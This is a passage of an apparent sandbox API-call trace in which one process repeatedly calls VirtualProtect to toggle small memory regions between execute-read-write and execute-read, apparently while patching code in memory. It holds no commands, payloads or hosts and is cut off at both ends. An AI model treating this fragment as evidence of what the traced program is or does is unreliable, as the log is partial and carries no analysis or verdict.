returned 1 [0042.883] VirtualProtect (in: lpAddress=0x1e8c160, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.883] VirtualProtect (in: lpAddress=0x1e8c164, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.883] VirtualProtect (in: lpAddress=0x1e8c164, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.883] VirtualProtect (in: lpAddress=0x1e8c17c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c17c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c180, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c180, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c19c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c19c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.884] VirtualProtect (in: lpAddress=0x1e8c1a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.885] VirtualProtect (in: lpAddress=0x1e8c1a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.885] VirtualProtect (in: lpAddress=0x1e8c1bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.885] VirtualProtect (in: lpAddress=0x1e8c1bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.885] VirtualProtect (in: lpAddress=0x1e8c1c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.885] VirtualProtect (in: lpAddress=0x1e8c1c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c1e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c1e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c1fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c1fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c200, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.886] VirtualProtect (in: lpAddress=0x1e8c200, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.887] VirtualProtect (in: lpAddress=0x1e8c220, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.887] VirtualProtect (in: lpAddress=0x1e8c220, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.887] VirtualProtect (in: lpAddress=0x1e8c240, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.887] VirtualProtect (in: lpAddress=0x1e8c240, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.887] VirtualProtect (in: lpAddress=0x1e8c260, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c260, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c280, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c280, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c2a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c2a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.888] VirtualProtect (in: lpAddress=0x1e8c2bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.889] VirtualProtect (in: lpAddress=0x1e8c2bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.889] VirtualProtect (in: lpAddress=0x1e8c2c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.889] VirtualProtect (in: lpAddress=0x1e8c2c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.889] VirtualProtect (in: lpAddress=0x1e8c2c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.889] VirtualProtect (in: lpAddress=0x1e8c2c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.890] VirtualProtect (in: lpAddress=0x1e8c2cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.890] VirtualProtect (in: lpAddress=0x1e8c2cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.890] VirtualProtect (in: lpAddress=0x1e8c2e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.890] VirtualProtect (in: lpAddress=0x1e8c2e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.890] VirtualProtect (in: lpAddress=0x1e8c2f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c2f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c2f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c2f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c310, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c310, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.891] VirtualProtect (in: lpAddress=0x1e8c330, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c330, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c350, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c350, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c370, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c370, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.892] VirtualProtect (in: lpAddress=0x1e8c378, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.893] VirtualProtect (in: lpAddress=0x1e8c378, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.893] VirtualProtect (in: lpAddress=0x1e8c37c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.893] VirtualProtect (in: lpAddress=0x1e8c37c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.893] VirtualProtect (in: lpAddress=0x1e8c394, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.893] VirtualProtect (in: lpAddress=0x1e8c394, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.894] VirtualProtect (in: lpAddress=0x1e8c398, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.894] VirtualProtect (in: lpAddress=0x1e8c398, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.894] VirtualProtect (in: lpAddress=0x1e8c3b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.894] VirtualProtect (in: lpAddress=0x1e8c3b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.894] VirtualProtect (in: lpAddress=0x1e8c3d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.895] VirtualProtect (in: lpAddress=0x1e8c3d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.895] VirtualProtect (in: lpAddress=0x1e8c3d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.895] VirtualProtect (in: lpAddress=0x1e8c3d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.895] VirtualProtect (in: lpAddress=0x1e8c3f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.895] VirtualProtect (in: lpAddress=0x1e8c3f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.896] VirtualProtect (in: lpAddress=0x1e8c418, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.896] VirtualProtect (in: lpAddress=0x1e8c418, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.896] VirtualProtect (in: lpAddress=0x1e8c438, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.896] VirtualProtect (in: lpAddress=0x1e8c438, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.897] VirtualProtect (in: lpAddress=0x1e8c458, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.897] VirtualProtect (in: lpAddress=0x1e8c458, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.897] VirtualProtect (in: lpAddress=0x1e8c478, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.897] VirtualProtect (in: lpAddress=0x1e8c478, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.897] VirtualProtect (in: lpAddress=0x1e8c494, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c494, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c498, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c498, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c4a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c4a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.898] VirtualProtect (in: lpAddress=0x1e8c4ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.899] VirtualProtect (in: lpAddress=0x1e8c4ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.899] VirtualProtect (in: lpAddress=0x1e8c4b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.899] VirtualProtect (in: lpAddress=0x1e8c4b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.899] VirtualProtect (in: lpAddress=0x1e8c4cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.899] VirtualProtect (in: lpAddress=0x1e8c4cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c4d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c4d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c4f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c4f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c50c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.900] VirtualProtect (in: lpAddress=0x1e8c50c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.901] VirtualProtect (in: lpAddress=0x1e8c510, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.901] VirtualProtect (in: lpAddress=0x1e8c510, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.901] VirtualProtect (in: lpAddress=0x1e8c518, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.901] VirtualProtect (in: lpAddress=0x1e8c518, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.901] VirtualProtect (in: lpAddress=0x1e8c51c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c51c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c534, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c534, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c538, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c538, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.902] VirtualProtect (in: lpAddress=0x1e8c554, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c554, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c558, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c558, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c574, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c574, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.903] VirtualProtect (in: lpAddress=0x1e8c578, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.904] VirtualProtect (in: lpAddress=0x1e8c578, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.904] VirtualProtect (in: lpAddress=0x1e8c594, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.904] VirtualProtect (in: lpAddress=0x1e8c594, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.904] VirtualProtect (in: lpAddress=0x1e8c598, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.904] VirtualProtect (in: lpAddress=0x1e8c598, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.905] VirtualProtect (in: lpAddress=0x1e8c5d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.906] VirtualProtect (in: lpAddress=0x1e8c5d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.906] VirtualProtect (in: lpAddress=0x1e8c5d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.906] VirtualProtect (in: lpAddress=0x1e8c5f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.906] VirtualProtect (in: lpAddress=0x1e8c5f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.906] VirtualProtect (in: lpAddress=0x1e8c5f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c5f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c600, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c600, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c604, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c604, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.907] VirtualProtect (in: lpAddress=0x1e8c61c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c61c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c620, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c620, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c628, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c628, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.908] VirtualProtect (in: lpAddress=0x1e8c62c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.909] VirtualProtect (in: lpAddress=0x1e8c62c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.909] VirtualProtect (in: lpAddress=0x1e8c634, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.909] VirtualProtect (in: lpAddress=0x1e8c634, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.909] VirtualProtect (in: lpAddress=0x1e8c638, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.909] VirtualProtect (in: lpAddress=0x1e8c638, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c654, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c654, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c658, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c658, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c674, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.910] VirtualProtect (in: lpAddress=0x1e8c674, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.911] VirtualProtect (in: lpAddress=0x1e8c678, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.911] VirtualProtect (in: lpAddress=0x1e8c678, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.911] VirtualProtect (in: 